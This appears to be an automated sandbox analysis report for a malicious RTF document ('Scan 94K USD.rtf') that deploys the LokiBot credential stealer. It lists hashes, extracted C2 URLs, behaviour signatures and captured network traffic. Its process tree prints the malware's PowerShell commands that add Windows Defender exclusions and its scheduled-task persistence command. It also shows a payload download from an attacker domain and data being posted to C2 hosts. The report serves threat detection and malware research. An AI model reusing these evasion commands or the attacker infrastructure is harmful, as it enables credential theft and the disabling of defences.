Analysis

  • max time kernel
    136s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    12-06-2024 06:25

General

  • Target

    Scan 94K USD.rtf

  • Size

    360KB

  • MD5

    39990481e7a4ebc5ee5b30b8f9ecb44b

  • SHA1

    48d884a85d9ef84e8726a8c825f0722878ab75d1

  • SHA256

    ac4e5f6f39aebb0f686813bd7ef6b678050d0876f05bd6f30aaf7d08f2d0d7d7

  • SHA512

    1c231dd4947d81b64e7e4dd526addc7d568b7e1b5049b41138073a38585c1a2cc0c54e88d4c5c40483bd29261169299e8552f3651c3e43fda98fafef0410f10c

  • SSDEEP

    6144:FwAYwAYwAYwAYwAYwAYwAYwAYwAYwAPIwL:uv

Malware Config

Extracted

Family

lokibot

C2

http://alphabetllc.top/alpha/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Scan 94K USD.rtf"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2832
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1844
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2680
      • C:\Users\Admin\AppData\Roaming\alpha34567.scr
        "C:\Users\Admin\AppData\Roaming\alpha34567.scr"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2512
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\alpha34567.scr"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2736
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\eZAoJt.exe"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:536
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eZAoJt" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5B0B.tmp"
          3⤵
          • Creates scheduled task(s)
          PID:788
        • C:\Users\Admin\AppData\Roaming\alpha34567.scr
          "C:\Users\Admin\AppData\Roaming\alpha34567.scr"
          3⤵
          • Executes dropped EXE
          PID:1256
        • C:\Users\Admin\AppData\Roaming\alpha34567.scr
          "C:\Users\Admin\AppData\Roaming\alpha34567.scr"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:2024

    Network

    • flag-us
      DNS
      dukeenergyltd.top
      EQNEDT32.EXE
      Remote address:
      8.8.8.8:53
      Request
      dukeenergyltd.top
      IN A
      Response
      dukeenergyltd.top
      IN A
      172.67.134.136
      dukeenergyltd.top
      IN A
      104.21.25.202
    • flag-us
      GET
      https://dukeenergyltd.top/alphaz.scr
      EQNEDT32.EXE
      Remote address:
      172.67.134.136:443
      Request
      GET /alphaz.scr HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Host: dukeenergyltd.top
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Wed, 12 Jun 2024 06:25:10 GMT
      Content-Type: application/x-silverlight
      Content-Length: 620552
      Connection: keep-alive
      Last-Modified: Wed, 12 Jun 2024 03:12:55 GMT
      ETag: "97808-61aa8c234e012"
      Accept-Ranges: bytes
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=apqeuMfTkQBfWVDGIv22XU7wzbPSZm9Wn1h7CWmHLtRPOO9r174KXuu9xh6stcMda4ULbcmZGQitWJUErjx5kqjQBHmmrTI5%2FumQ15HC3dTsEaHgBmY3TkNVxFXOo7EZ4kXcQA%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Strict-Transport-Security: max-age=0; includeSubDomains; preload
      X-Content-Type-Options: nosniff
      Server: cloudflare
      CF-RAY: 8927c3142be09483-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      alphabetllc.top
      alpha34567.scr
      Remote address:
      8.8.8.8:53
      Request
      alphabetllc.top
      IN A
      Response
      alphabetllc.top
      IN A
      104.21.79.102
      alphabetllc.top
      IN A
      172.67.169.238
    • flag-us
      POST
      http://alphabetllc.top/alpha/five/fre.php
      alpha34567.scr
      Remote address:
      104.21.79.102:80
      Request
      POST /alpha/five/fre.php HTTP/1.0
      User-Agent: Mozilla/4.08 (Charon; Inferno)
      Host: alphabetllc.top
      Accept: */*
      Content-Type: application/octet-stream
      Content-Encoding: binary
      Content-Key: 5C35B926
      Content-Length: 374
      Connection: close
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 12 Jun 2024 06:25:23 GMT
      Content-Type: text/html; charset=UTF-8
      Connection: close
      X-Powered-By: PHP/5.4.16
      Status: 404 Not Found
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5uBvEKMCQPcnPIhRSLj5IiHeXQkWq7xuHhOwUDNVm9le5oLudS8AGTegRQ11MBgdcQdNJIVjHRb%2FFZgchxzVhQB95Yo8mScKbSjLi%2BvnGQPMBIyEzt9Y4b7%2BetfJ83fWd88%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8927c366187d6400-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-us
      POST
      http://alphabetllc.top/alpha/five/fre.php
      alpha34567.scr
      Remote address:
      104.21.79.102:80
      Request
      POST /alpha/five/fre.php HTTP/1.0
      User-Agent: Mozilla/4.08 (Charon; Inferno)
      Host: alphabetllc.top
      Accept: */*
      Content-Type: application/octet-stream
      Content-Encoding: binary
      Content-Key: 5C35B926
      Content-Length: 180
      Connection: close
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 12 Jun 2024 06:25:23 GMT
      Content-Type: text/html; charset=UTF-8
      Connection: close
      X-Powered-By: PHP/5.4.16
      Status: 404 Not Found
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2BS%2FYJiU%2B5nhkTzgUf6hpG2B6ZguwpFN5FQPPwAbRY59PHd9vflmDdGKBeUDGeJ9J9liRhIDfCO0jTf6Zbf3VKMVpiCV4DGt0UtsRnT30lju97LkG3W0em1ZPiSCUf4zqhU%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8927c3682def6439-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-us
      POST
      http://alphabetllc.top/alpha/five/fre.php
      alpha34567.scr
      Remote address:
      104.21.79.102:80
      Request
      POST /alpha/five/fre.php HTTP/1.0
      User-Agent: Mozilla/4.08 (Charon; Inferno)
      Host: alphabetllc.top
      Accept: */*
      Content-Type: application/octet-stream
      Content-Encoding: binary
      Content-Key: 5C35B926
      Content-Length: 153
      Connection: close
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 12 Jun 2024 06:25:23 GMT
      Content-Type: text/html; charset=UTF-8
      Connection: close
      X-Powered-By: PHP/5.4.16
      Status: 404 Not Found
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FJKE07vY%2BVsz8iv2vs5P8U02Ck8DVB2jensQfJ5l6TOSArgO2TiH1e6niBXiAzbStHYmjzllBq%2B51BEFzfVZ%2FPXXZvXy4I5BebRR2OmciKwtUhM1UncGoMOxtr6fAKTrUa0%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8927c369ed0871c2-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-us
      POST
      http://alphabetllc.top/alpha/five/fre.php
      alpha34567.scr
      Remote address:
      104.21.79.102:80
      Request
      POST /alpha/five/fre.php HTTP/1.0
      User-Agent: Mozilla/4.08 (Charon; Inferno)
      Host: alphabetllc.top
      Accept: */*
      Content-Type: application/octet-stream
      Content-Encoding: binary
      Content-Key: 5C35B926
      Content-Length: 153
      Connection: close
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 12 Jun 2024 06:26:23 GMT
      Content-Type: text/html; charset=UTF-8
      Connection: close
      X-Powered-By: PHP/5.4.16
      Status: 404 Not Found
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Isa6hQVIqGEzViYd4tfeoHaTh1dh88ms1oiq%2F4YNYe6hYI5UnO5VaMBqUXuFfTXWA%2FXITOv%2Fw7HINPeuZi5sSmU7dgyQyNNzPndFB00LGrKYrA5iO641luWV5gxUuLVGub4%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8927c4e2afdd635f-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-us
      POST
      http://alphabetllc.top/alpha/five/fre.php
      alpha34567.scr
      Remote address:
      104.21.79.102:80
      Request
      POST /alpha/five/fre.php HTTP/1.0
      User-Agent: Mozilla/4.08 (Charon; Inferno)
      Host: alphabetllc.top
      Accept: */*
      Content-Type: application/octet-stream
      Content-Encoding: binary
      Content-Key: 5C35B926
      Content-Length: 153
      Connection: close
      Response
      HTTP/1.1 404 Not Found
      Date: Wed, 12 Jun 2024 06:27:24 GMT
      Content-Type: text/html; charset=UTF-8
      Connection: close
      X-Powered-By: PHP/5.4.16
      Status: 404 Not Found
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j6jdAUxE%2BQj670m2xzzkgG3WHlLH%2FSuw9aBJmpk%2BCMR2hS%2BclqLPV8LUCszEPsE3GP54M2IwwWhTrltvvy3JsPEtQH8HfVYIoHfdSBJE3ln7TbUD4JgNVDwimHL0DnfqD60%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8927c65b6b9f93ed-LHR
      alt-svc: h3=":443"; ma=86400
    • 172.67.134.136:443
      https://dukeenergyltd.top/alphaz.scr
      tls, http
      EQNEDT32.EXE
      12.5kB
      652.3kB
      256
      495

      HTTP Request

      GET https://dukeenergyltd.top/alphaz.scr

      HTTP Response

      200
    • 104.21.79.102:80
      http://alphabetllc.top/alpha/five/fre.php
      http
      alpha34567.scr
      890 B
      869 B
      6
      6

      HTTP Request

      POST http://alphabetllc.top/alpha/five/fre.php

      HTTP Response

      404
    • 104.21.79.102:80
      http://alphabetllc.top/alpha/five/fre.php
      http
      alpha34567.scr
      696 B
      869 B
      6
      6

      HTTP Request

      POST http://alphabetllc.top/alpha/five/fre.php

      HTTP Response

      404
    • 104.21.79.102:80
      http://alphabetllc.top/alpha/five/fre.php
      http
      alpha34567.scr
      669 B
      879 B
      6
      6

      HTTP Request

      POST http://alphabetllc.top/alpha/five/fre.php

      HTTP Response

      404
    • 104.21.79.102:80
      http://alphabetllc.top/alpha/five/fre.php
      http
      alpha34567.scr
      669 B
      877 B
      6
      6

      HTTP Request

      POST http://alphabetllc.top/alpha/five/fre.php

      HTTP Response

      404
    • 104.21.79.102:80
      http://alphabetllc.top/alpha/five/fre.php
      http
      alpha34567.scr
      623 B
      879 B
      5
      6

      HTTP Request

      POST http://alphabetllc.top/alpha/five/fre.php

      HTTP Response

      404
    • 8.8.8.8:53
      dukeenergyltd.top
      dns
      EQNEDT32.EXE
      63 B
      95 B
      1
      1

      DNS Request

      dukeenergyltd.top

      DNS Response

      172.67.134.136
      104.21.25.202

    • 8.8.8.8:53
      alphabetllc.top
      dns
      alpha34567.scr
      61 B
      93 B
      1
      1

      DNS Request

      alphabetllc.top

      DNS Response

      104.21.79.102
      172.67.169.238

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\tmp5B0B.tmp

      Filesize

      1KB

      MD5

      a52309e841064384aa48fdf9392e78d0

      SHA1

      4352f8a817268f71e1fb97b10fb6460c7521e891

      SHA256

      848edbd46b7080201440e8637689f5e4495f5384056373400f79847265de4b27

      SHA512

      8679b4bd342aa9a1e774ab8430f563db218a438b812ff0cc08d8c0623669183d3d4f606b46b605aa75b39063208cf3366837eb48acfcea7966c2262ce84838a2

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1340930862-1405011213-2821322012-1000\0f5007522459c86e95ffcc62f32308f1_527e8b4f-d968-48c7-a5cc-e9c96c60868c

      Filesize

      46B

      MD5

      d898504a722bff1524134c6ab6a5eaa5

      SHA1

      e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

      SHA256

      878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

      SHA512

      26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1340930862-1405011213-2821322012-1000\0f5007522459c86e95ffcc62f32308f1_527e8b4f-d968-48c7-a5cc-e9c96c60868c

      Filesize

      46B

      MD5

      c07225d4e7d01d31042965f048728a0a

      SHA1

      69d70b340fd9f44c89adb9a2278df84faa9906b7

      SHA256

      8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

      SHA512

      23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      2bfcc6bc24911dc8d87edd270c14a5f0

      SHA1

      6144ac2c4a3b09410010b5247ac14e338af3d528

      SHA256

      6f8fffb058286b8a51f66fde5efb26b4557f8da0225ed941fbfa2d8fabbdf7f4

      SHA512

      84819f136360963369521a0473b92fb22d8efe16a8ef41645c607e9ed00d93e192ebfb08898be7b8fbfa88e0ec8961def5d66222db2be93c67380f3e39fdafca

    • \Users\Admin\AppData\Roaming\alpha34567.scr

      Filesize

      606KB

      MD5

      7f84fcf457a46b922d6a1b4c8773dc9d

      SHA1

      cd08dc3047946777419a7ea00d82764061cf84ab

      SHA256

      52bcfea0c53b74e2b84b54d5b9c5d4b3f214017063e3b3339bf95c84ab62f485

      SHA512

      584777150643035a12e71e535d8479b7df87d4c8d31423bee97d517b6b770814ede6135e44fbb984bbe31dbcfd8e5b8b90592b5050c35c07e470bfbfd199db5e

    • memory/2024-65-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/2024-60-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/2024-96-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/2024-86-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/2024-54-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/2024-62-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/2024-67-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/2024-56-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/2024-64-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

    • memory/2024-58-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/2512-39-0x0000000000A10000-0x0000000000A2A000-memory.dmp

      Filesize

      104KB

    • memory/2512-34-0x0000000000A60000-0x0000000000AF8000-memory.dmp

      Filesize

      608KB

    • memory/2512-33-0x000000006B7EE000-0x000000006B7EF000-memory.dmp

      Filesize

      4KB

    • memory/2512-42-0x0000000004BF0000-0x0000000004C52000-memory.dmp

      Filesize

      392KB

    • memory/2512-41-0x00000000004C0000-0x00000000004D0000-memory.dmp

      Filesize

      64KB

    • memory/2832-0-0x000000002FF01000-0x000000002FF02000-memory.dmp

      Filesize

      4KB

    • memory/2832-2-0x000000007166D000-0x0000000071678000-memory.dmp

      Filesize

      44KB

    • memory/2832-88-0x000000007166D000-0x0000000071678000-memory.dmp

      Filesize

      44KB

    • memory/2832-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2832-118-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.